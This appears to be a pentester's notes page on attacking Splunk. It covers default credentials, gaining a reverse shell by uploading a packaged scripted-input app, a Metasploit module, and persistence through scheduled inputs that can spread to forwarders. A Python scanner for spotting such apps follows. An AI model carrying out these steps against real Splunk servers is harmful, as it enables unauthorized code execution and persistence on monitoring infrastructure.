Splunk

attacking_common_applications

Splunk is a web interface for searching, monitoring, and analyzing machine-generated data in real-time. It's often used as a SIEM.

It's paid software. There is a 60-day free trial for companies.

Ports 🐲: 8000 (TCP/HTTPS), 8089 (TCP/Splunkd)

Splunkbase is the official site for browsing add-ons that extend Splunk, usually for a specific use case.


Splunk Pentester Notes ☠️

attacking_common_applications splunkd splunk_lpe_and_persistence

Enumeration

  • Navigate to Help > About > Version to find the version (requires being logged in)

Foothold

  • There is no authentication in the free version. If an expired trial is still installed, it reverts to the free version.

  • Default credentials are admin:changeme in older versions. In newer versions, the password is set at install time.

Exploitation

There are multiple ways of running code. We can use a scripted input such as reverse_shell_splunk (0.03k ⭐, 2018 🪦).

To target a Windows host, configure the run.ps1 script before packaging the app.

$ git clone https://github.com/0xjpuff/reverse_shell_splunk
$ cd reverse_shell_splunk/
$ nano reverse_shell_splunk/bin/run.ps1
$ tar -cvzf updater.tar.gz reverse_shell_splunk

Navigate to Apps > Edit, and click on "install app from file."

➡️ See also: use exploit/multi/http/splunk_upload_app_exec.

➡️ For persistence, we may configure the schedule of the scripted input. If the server is a deployment server and the target hosts run Universal Forwarders, we may be able to compromise them as well.
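As an added example (not from these notes or from the reverse_shell_splunk project), here is the defender-side check for the mechanism above: inspect an uploaded Splunk app bundle for [script://...] stanzas in inputs.conf and report the script path, its interval and whether it is enabled. The bundle, its file path and the run.ps1 stanza are a constructed sample.

```python
"""Scan a Splunk app bundle (.tar.gz) for scripted inputs: [script://...]
stanzas in inputs.conf, the mechanism a malicious app uses to run code."""
import io
import re
import tarfile

STANZA_RE = re.compile(r"^\s*\[(script://[^\]]+)\]\s*$")
KV_RE = re.compile(r"^\s*([^#;=\s][^=]*?)\s*=\s*(.*?)\s*$")

def parse_scripted_inputs(conf_text):
    """Return one dict per [script://...] stanza: script path, interval, disabled."""
    findings = []
    current = None
    for line in conf_text.splitlines():
        m = STANZA_RE.match(line)
        if m:
            # disabled defaults to 0 (enabled) when omitted; None = interval not set
            current = {"stanza": m.group(1), "interval": None, "disabled": "0"}
            findings.append(current)
            continue
        if line.lstrip().startswith("["):  # another stanza type, e.g. [monitor://...]
            current = None
            continue
        kv = KV_RE.match(line) if current is not None else None
        if kv and kv.group(1).lower() in ("interval", "disabled"):
            current[kv.group(1).lower()] = kv.group(2)
    return findings

def scan_app_tarball(data):
    """Map each inputs.conf path inside the .tar.gz to its scripted-input findings."""
    results = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile() and member.name.endswith("inputs.conf"):
                text = tar.extractfile(member).read().decode("utf-8", "replace")
                hits = parse_scripted_inputs(text)
                if hits:
                    results[member.name] = hits
    return results

def build_sample_bundle():
    """Constructed sample: one enabled scripted input running every 10 seconds."""
    conf = (b"[script://./bin/run.ps1]\ndisabled = 0\ninterval = 10\n"
            b"sourcetype = shell\n\n[monitor:///var/log/syslog]\ndisabled = 0\n")
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("updater/default/inputs.conf")
        info.size = len(conf)
        tar.addfile(info, io.BytesIO(conf))
    return buf.getvalue()
```

Run it against the apps directory of a Splunk instance (or against bundles before they are approved for upload) and alert on any enabled script stanza with a short interval that nobody can account for.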


👻 To-do 👻

Stuff I found but haven't read/used yet.

  • Splunkd, Splunk management, communication with Splunk REST API